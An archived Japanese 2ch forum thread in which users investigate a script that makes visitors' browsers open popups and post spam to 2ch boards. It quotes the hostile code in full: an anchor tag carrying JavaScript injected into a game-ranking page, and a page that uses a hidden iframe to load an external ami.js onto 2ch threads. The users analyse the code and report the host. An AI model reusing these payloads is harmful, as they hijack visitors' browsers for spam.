■ スレ立て・投稿スクリプト対策
■ このスレッドは過去ログ倉庫に格納されています
踏むとスレ立てしたり投稿したりするスクリプトにつて
情報を集めたり対策したりするスレです。 >>592
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
の,ソースとその先のスクリプトを調べてみましたがそれらしい記述が
見つかりませんです…(偽装してあると私にはわかりません)
どなたかソースを見つけた方はいますか?
この中で一番古い日付は
http://ex.2ch.net/test/read.cgi/net/1072776652/795
795 :795 :04/01/21 22:42 ID:5/NdN2ae
なので,あながち別物とも考えづらいけど。
スクリプトに詳しい方がおりましたら調査していただけると…
>>593
ttp://www.game-can.com/ffa/index.html の
> 4階 5連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:374413479/Max:465998585<br>
> 3階 4連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:465385436/Max:465385436<br>
> 2階 16連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:462467736/Max:462467736<br>
で跳んだ先のamiiy.hp.infoseek.co.jpにこんなもの↓が。私も詳しくないので詳しい方解析頼みます。。。
<BODY onload=setTimeout("IframeOpen()",1000)>
<SCRIPT>
if(location.search.match(/0$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/1$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/2$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074704813/l1'}
else if(location.search.match(/3$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072221036/l1'}
else if(location.search.match(/4$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/5$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/6$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/7$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/8$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/9$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else if(location.search.match(/10$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else{thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
if(thread.match(/^http:\/\/([^\/]+)\/test\/read\.cgi\/([^\/]+)\//i)){itai='http://'+RegExp.$1+'/'+RegExp.$2+'/i/'}
document.write('\x3cIFRAME\x20ID=myiframe\x20SRC=\x22'+itai+'\x22\x20width=0\x20height=0\x3e\x3c/IFRAME\x3e');
myiframe.open(thread,"_search");
function IframeOpen() {
myiframe.open("javascript:document.write('<body><script\x20src=javascript:document.charset=\x22sjis\x22>
</script\x3e'+document.body.innerHTML+'</body><script\x20src=http://amiiy.hp.infoseek.co.jp/ami.js></script\x3e');","_search");
}
</SCRIPT>
</BODY> >>593
スクリプトは詳しくありませんが
該当のところをクリックするとIEがデスクトップ上では開かずにブラクラ状態で繁殖しますタスクバーの表示で確認できます
履歴で呼び出すと検索窓からつついているみたい。履歴のプロパティから↓
飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/?1
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/?1
?1〜?8←以上IEが動作します
そのなかの”js”でさらにループしているみたいですね
飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/ami.js
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/ami.js
hを抜くとかえってあぶないのでチェックサイトへの直リンお許しください。 完全にランダムで文章作って自動で投稿させてますね。
こういうのはあったけど、ソースまで見つかったのは久々な気も。 >>595
補足
IEだと飛び先のチェックはime.nu経由だと二つ目のhttpが消えているので表示されないようです
ぷらら(plala)規制中50
http://aa2.2ch.net/test/read.cgi/accuse/1074403046/
もみたい。
ってもしかして対象スレもある程度ランダムで作ってるのかも… >>592-599
該当サイトは現在403になりました。
インフォシークにブラクラとして通報できたんですがサイト案内判りづらかった。。。
ついさっきまで探してました。
ソースチェッカーオンラインはデータログを元に表示しているようなのでまだそのままです。 遅くなりました。
>>594-601
乙でしたー。ありがとうございます。
その先までは見てませんでした…
スクリプト切って見てたので判らなかったし。
ところで,今現在のソースを見るとエンコードが簡体中国なんですが,
やっぱりアチラの方なんですかねえ…
>>602
IEの仕様(?)っぽいですね。
本来なら
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
↑のサイトにも通報したかったのですがセキュリティが低すぎて
怖くてできませんでした。((;゚Д゚)ガクガクブルブル
>>603
乙でした。 ttp://fire.prohosting.com/script9/news.html#unko
unkoは前にもネトヲチ板爆撃してたな >>602
どうなんでしょ?漏れが見た時点では変数名がkigoとかだったんで
日本の人だと思うんですが。
なんにしろとまった用で何より。 >>606
なるほど,言われてみれば確かに。
やはり>>605なんですね…
>とまった用で何より
ですねー
>>604
すんません,見逃してました。
ありがとうございます。
>↑のサイトにも通報
どうやら最新の記録登録者みたいな感じで出ていたようですし,
サイト側でどうにかできたかぼみょーっすね…
おつでしたー
■ このスレッドは過去ログ倉庫に格納されています